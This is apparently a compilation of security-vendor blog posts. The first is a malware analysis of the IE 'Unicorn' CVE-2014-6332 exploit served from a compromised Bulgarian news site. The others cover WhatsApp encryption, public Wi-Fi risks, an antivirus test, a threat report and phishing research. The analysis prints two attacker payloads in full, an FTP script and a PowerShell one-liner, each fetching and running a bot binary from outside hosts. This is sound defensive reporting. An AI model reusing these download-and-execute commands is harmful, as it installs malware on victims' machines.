First exploitation of Internet Explorer ‘Unicorn bug’ in-the-wild

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and among the 11,000 first worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about some TV Reality show winners.

1_blitz_site

The page source contains an invisible HTML iframe pointing to the exploit:

2_injected_iframe

As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:

3_credit_exploit

 

 

 

It is easily modifiable and allows the attacker to write the payload in VBScript.

Strangely, the exploit is actually present two times consecutively. The first time, the payload is:

cd %TEMP%&
@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&
@echo vbs@carolinasregion.org>>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands that will be executed in the context of cmd.exe. The first group, prefixed by @echo, will write the commands in a text file (“KdFKkDls.txt”, but the name is different each time one pulls the exploit). Then the file is passed to the ftp command. It will connect to an ftp server with a username/password, download a binary, and execute it.
In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://natmasla[.]ru/ath/sploit/natmasla.exe’,’%TEMP%\natmasla.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%\natmasla.exe’)

This time it uses PowerShell to download a binary payload, which is actually the same as the one downloaded by the first payload.During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.
The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, as launching DDoS attacks, or opening remote shells for the miscreants. As a funny fact, it contains an Einstein’s citation “Anyone who has never made a mistake has never tried anything new.”

Conclusion

Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take time do it right now through Windows Update.

WhatsApp gets tough on security

The popular messaging service WhatsApp has stepped up security for users of its consumer messaging service by adopting end-to-end encryption.

In what represents the largest rollout of this level of encryption in any messaging system worldwide, according to the BBC, WhatsApp integrated Open Whisper Systems’ TextSecure software – which will be turned on by default for Android users – with WhatsApp’s iOS consumers to follow suit. Although in an Open Whisper blog post, the suggestion was that the team still ‘have a ways to go until all mobile platforms are fully supported, but we are moving quickly towards a world where all WhatsApp users will get end-to-end encryption by default.”

What makes this end-to-end solution so exciting is that no decrypting of messages is done over the air or via the messaging service’s servers. It’s all done on the device as it sends and receives messages, meaning not even WhatsApp itself can access your private messages. In addition to this, the encryption supports asynchronous data transfers, so even if the recipient is not online, the encryption still functions properly even when the message’s recipient is offline.

In addition, each message uses a one-time message decryption key. Even if someone managed to hack one message, the same key would not be usable to decode other messages, as reported by The Register.

That said, Open Whisper were quick to point out that,”The WhatsApp Android client does not yet support encrypted messaging for group chat or media messages, but we’ll be rolling out support for those next…’

WhatsApp has somewhere in the region of 600 million active users, making it the most popular messaging tool by some margin in most of the world’s major territories.

Public Wi-Fi hotspots – know the risks

Using public Wi-Fi can be risky – and security experts such as Europol’s Troels Oerting have even suggested it’s TOO risky, and that we should abandon public Wi-Fi hotspots altogether.

If your computer happens to be filled with trade secrets (or any business data for that matter), that’s probably a good idea – your colleagues will appreciate your waiting until you are somewhere you can connect securely.

Earlier this year, Oerting, the head of Europe’s Europol Cyber Crime division, warned that free hotspots were increasingly used to steal private information from consumers in Europe, as reported by We Live Security here. Oerting said, “We have seen an increase in the misuse of Wi-Fi in order to steal information, identity or passwords and money from the users who use public or insecure wi-fi connections.”

Up to 10% of workers admit to using public hotspots with work machines, according to a recent survey by phone insurer ProtectYourBubble.

For ordinary PC and smartphone users, Wi-Fi is not ideal – but it’s sometimes near-inescapable.

ESET Researcher Stephen Cobb says in a how-to for computing on the go,

“Consider using a 3G or 4G hotspot instead of hotel Internet or free public Wi-Fi hotspots. If you are logging into a work network, use a VPN, and do not visit banking or shopping sites.”

Frequent travellers might find it cheaper to buy a local SIM card for data – or share a 3G or 4G data connection from a smart device.

But if you are travelling somewhere where cellphone reception is poor, these steps will help you get online as safely as possible.

Double-check the network before you use it

Public Wi-Fi hotspots - know the risks

The worst thing you can do is assume a Wi-Fi network is legitimate – or run by the establishment you’re in. It might be a decoy deployed by a criminal.

As a general rule, don’t connect to any network called, ‘Free Wi-Fi’ – if they’re advertising that, they may well want you to sign up for a newsletter or endure adverts, even if the hotspot isn’t malicious.

Mark James, ESET Security Specialist, says, “If it’s a public service (coffee shop, McDonalds etc.) check the WiFi name with a member of staff – don’t just connect to the first one you see, it could be there to harvest your information.”

It’s probably safer NOT to check email and Facebook on your cellphone

Once you’ve reassured yourself that the hotspot is legitimate, you probably want to check email messages – this is best done via your PC, as you can use the browser’s secure icon (usually a lock or similar in your address bar) to check that you are connected securely (ie via HTTPS).

Hackers who are monitoring network traffic are looking for you to type in passwords – email acount ones, social network passwords.

Mark James, ESET Security Specialist says, ‘I would personally limit my activities to anything that does not require a username and password to log in, but please bear in mind most apps on your smartphone will auto login. Generally browsing and information look-ups are going to be fairly safe.’

Overall, smartphones come a poor second to PCs or Macs when it comes to public Wi-Fi hotspots – the ‘defenses’ built into PC browsers make it easier to reassure yourself you’re being safe.

Using email apps on your phone can leak data – a secure HTTPS website is better, ESET’s Mark James says.

“For email, it’s better to use a secure HTTPS website for emails rather than using pop3 from your mobile, as this is easily interrogated using free apps on the same WiFi connection.” If you’re sending corporate email, or sensitive emails, it’s best to use encryption (a more detailed We Live Security how-to offers tips here).

What not to say in public Wi-Fi hotspots

Public Wi-Fi hotspots - know the risks 2

Typically, attacks on Wi-Fi hotspots are ‘man-in-the-middle’ attacks – where an attacker is able to access your data as it travels.

That means anything financial or corporate is out – don’t type in your credit card details, don’t buy anything, don’t visit your bank’s website.

If you have to connect to your work environment, use a VPN – otherwise, wait until you’re in a safer environment.

Prepare yourself first

If you’re going to use your computer in a risky environment, ensure sharing is switched off – you don’t want unknown attackers having access to your files.

On a Mac, you’ll find this under Sharing Preferences.

On a PC your homegroup and sharing settings will vary according to your OS.

Set all your websites to ‘secure’ before you log on

Most web services will offer the option to enable HTTPS – secure browsing – by default. It’s sensible to ensure that you’ve activated this on services you’re going to use frequently.

HTTPS helps ensure that a browser is connecting to what it thinks it is. The Electronic Frontier Foundation offers a plug-in which forces your browser to connect via HTTPS where possible.

Many services – such as Google Mail – do this by default, but others which don’t default to the more secure setting will offer an option to enable it. Find it in your accounts ‘Settings’ menu and enable it.

What CAN you do?

Travelers will be on safe ground researching information, or checking news sites, or looking at maps of the local area – but anything financial, such as booking a hotel, is best done either via your mobile device’s connection, or just over the phone.

When to say, ‘No’ to a hotspot

Public Wi-Fi hotspots - know the risks 3

In remote areas, or certain countries in the Far East, it’s perfectly normal to encounter Wi-Fi networks with no security whatsoever – in most cases, this is simply for ease of use, as guests are constantly traveling through the hotel or bar, or cafe.

Don’t connect to these hotspots, ESET’s Mark James warns: “If someone is snooping your data you will NOT know they are doing it.”

Forget the hotspot when you leave

Even big chain Wi-Fi Hotspots pose risks – and the last thing you want is your smart device attempting to connect to the same hotspot later, when you’re not looking.

Smart devices can give away a surprising amount of data from apps connecting to remote servers – so it’s always a good policy to police your list of ‘known’ networks thoroughly

The worst of these can be Hotspot networks which your cellphone provider has a deal with – which phones will sometimes default to connecting to, without alerting the user, as reported by We Live Security here.

The report found that the two services allowed smartphones to reconnect to public Wi-Fi hotspots automatically, which could leave users vulnerable to fake hotspots with the right name, able to redirect users to bogus websites to harvest usernames and passwords.

Ars Technica’s IT editor Sean Gallagher writes that the services open both Android and iPhone to a serious security threat, saying, “There’s a much bigger threat to your security than somebody randomly fishing for you to connect to them—the networks you’ve already connected to and trusted, like AT&T and Xfinity.”

ESET awarded highest score in AV-Comparatives Performance Test

AVcomp

ESET received highest scores for its latest product release of ESET Smart Security in the latest AV-Comparatives Performance Test.

Published yesterday, AV-Comparatives awarded the new version of ESET Smart Security with the Advanced+ Award. Details of the test show that ESET achieved the highest score for performance, outperforming all contenders, including AVG, Avira, BitDefender, F-Secure, Kaspersky, McAfee and Sophos, and Trend Micro.

AV-Comparatives focused on testing the impact that security software can have on system performance when specific tasks, such as downloading, opening, copying, encoding and archiving files, as well as installing and launching applications, are performed.

AV-Comparatives has used several own test cases and PC Mark Tests, an industry-recognized performance test. The award is based on AV-Comparative’s  assessment of the overall impact results with default settings under Windows 8.1 64-Bit.

During the whole year ESET showed an excellent performance in all of our tests. As well as ESET is very good in protecting the customer, it showed that it has nearly no impact on the speed of the computer also in the latest performance test,“ said Andreas Clementi, CEO at AV-Comparatives.

ESET Smart Security delivers multiple layers of Internet protection and keeps your identity safe with Anti-Theft, Personal Firewall and Anti-Phishing. This ESET security suite boasts brand new technology such as Botnet Protection that protects against infiltration by botnet malware as well as Enhanced Exploit Blocker that blocks attacks specifically designed to evade antivirus detection.

“We are really pleased with this award,” said Ignacio Sbampato, Chief Sales and Marketing Officer at ESET. “Offering stellar protection against today’s threats is an absolute must for any security vendor, but doing so with absolute minimum system impact is an art, which – done well – makes a huge difference to customers.”

Read the full AV-Comparatives report or learn more about ESET Smart Security.

 

Monthly Threat Report: October 2014

Top_10_ELG_oct_14_1200x627eng-01

The Top Ten Threats

 

1. HTML/Refresh
Previous Ranking: 1
Percentage Detected: 3.66%

HTML/Refresh is a Trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

 

2. Win32/Bundpil
Previous Ranking: 2
Percentage Detected: 2.24%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address from which it tries to download several files. The files are then executed and HTTP protocol is used for comunication with the C&C to receive new commands. The worm may delete the following folders:

*.exe
*.vbs
*.pif
*.cmd
*Backup.

 

3. JS/Kryptik.I
Previous Ranking: 3
Percentage Detected: 2.17%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.

 

4. Win32/RiskWare.NetFilter
Previous Ranking: 5
Percentage Detected: 1.49%

Win32/RiskWare.NetFilter is an application that includes malicious code designed to force infected computers to allow an attacker to remotely connect to the infected system and control it, in order to steal sensitive information or install other malware.

 

5. Win32/Adware.MultiPlug
Previous Ranking: 4
Percentage Detected: 1.47%

Win32/Adware.Multiplug is a Possible Unwanted Application that once it’s present into the users system might cause applications to displays advertising popup windows during internet browsing.

 

6. HTML/ScrInject
Previous Ranking: n/a
Percentage Detected: 1.45%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

 

7. LNK/Agent.AK
Previous Ranking: 6
Percentage Detected: 1.40%

LNK/Agent.AK is a link that concatenates commands to execute legitimate code while running the threat code in the background. It is similar in its effect to the older autorun.inf type of threat. This vulnerability became known at the time of discovery of Stuxnet, as it was one of four vulnerabilities that were executed by Stuxnet variants.

 

8. Win32/Sality
Previous Ranking: 7
Percentage Detected: 1.34%

Sality is a polymorphic file infector. When executed it starts a service and created/deleted registry keys related to security applications activite in the system and to ensure that the malicious process restarts at each reboot of operating system. It modifies EXE and SCR files and disables services and processes implemented by and associated with security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

 

9. HTML/Iframe
Previous Ranking: 8
Percentage Detected: 1.24%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

 

10. INF/Autorun
Previous Ranking: 10
Percentage Detected: 1.22%
INF/Autorun is a generic detection of versions of the autorun.inf configuration file created by malware. The malicious AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of all the available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in an attempt to hide the file from Windows Explorer.

 

Even IT Pros guilty of risky selfies on their mobiles

ESET study reveals many IT professionals are guilty of storing indecent material on their mobile phones, which would leave them embarrassed if lost

It appears that Jennifer Lawrence is not the only one with problematic photos on her mobile device. According to a new survey from ESET, 39 percent of the UK’s leading IT professionals have also confessed that if they were to lose their phone, some of the photos and information they have stored on the device could compromise them.

The survey, which was carried out at IPEXPO in October and studied the attitudes of 500 IT professionals, also revealed that 46 percent of respondents admitted that if they were to lose their phone with work information on it, and it was subsequently hacked, it could jeopardise or compromise their company. But that’s not all. A worrying 15 percent of respondents said they are not confident that the photos they take on their phone are not being streamed to other members of their family. Let’s just hope that they are not taking pictures of anything too sinister, or they could find themselves in the same position as Cameron Diaz was in her latest movie ‘Sex Tape’.

The recent news around celebrity phones being hacked and their images being stolen and posted online should act as a warning. Mobile phones are a very attractive target for cybercriminals as they hold so much information. Phone users should be very cautious with what content they have stored on their device.

Other concerning findings from the study revealed that despite most respondents admitting to storing compromising data on their mobile, 22 percent do not have a facility to remote wipe their device.

ESET’s security experts recommend: “A remote wipe facility is really your only piece of insurance against a lost phone. It essentially means that if you lose your mobile phone, you could log into a PC and remotely delete all the data stored on the device. This means that anyone who finds the phone will not be able to access any of your personal information. If you choose to store data on your phone which has the potential to compromise you, if it ended up in the wrong hands, you should deploy a security solution which offers a remote wipe facility.”

In order to help protect data on mobile devices, ESET recommends the following steps:

  • Use a password on your phone at all times
  • Restrict how long you keep emails for on your phone – don’t store things unnecessarily for more than a couple of days
  • Restrict the amount of information you keep on your phone
  • Delete any photos you don’t need and download them frequently to your own computer, where you can store them safely
  • Be mindful of where you are streaming your photos
  • Make sure you do back-ups frequently and check that they are actually being backed up and working
  • Try wherever possible to have remote lock and remote wipe available for your mobile phone. Lock the device if it’s lost, then wipe it if needed. Always bear in mind it’s unlikely you will get your phone back after it’s lost

Realistic looking phishing websites work 45% of the time, Google claims

Google has teamed up with the University of California in San Diego to publish surprising new research about phishing, how effective it is and how scammers work their phishing operations.

The study found, amongst a few startling revelations, that an effective phishing website (specifically one that looks legitimate and realistically like the expected website) will have a 45% success rate at harvesting data. This drops to 14% for an average looking imitation, and all the way down to 3% for a more obviously fake version.

The Huffington Post reports that the study was done by looking at 100 phishing emails from a random sample self-reported by Gmail users, and 100 more filtered via Google’s Safe Browsing system. All of these websites used Google Forms, which is “how researchers were able to access the data.”

Just as interesting was how cybercriminals would interact with the data once it had been compromised. They moved fast, with Engadget noting that 20% of leaked account data was used within half an hour of the information being stolen.

With one attacker potentially “responsible for millions of phishing emails”, they have to work at speed, with the cybercriminal quickly assessing whether or not the compromised account is worth their time, and The Huffington Post reports that they leave if it doesn’t seem “valuable enough.” On average, they spend just three minutes doing this, using the search functionality of the compromised email account to look for valuable key-phrases such as ‘bank’ or ‘wire transfer’.

The hacker will then often try and manipulate the victim’s contacts into paying extra money by sending fake emails out, using tried and tested stories about ‘getting mugged’ abroad or similar. Otherwise, they may just send out more links to capture more victims’ data. This is a sensible strategy for the criminals: Google reported that people approached with fake links via a trusted friend were “36 times more likely to be hijacked themselves.”

The study found that the majority of the cybercriminals operating phishing scams were located in China, the Ivory Coast, Malaysia, Nigeria and South Africa.

Follow

Get every new post delivered to your Inbox.

Join 78 other followers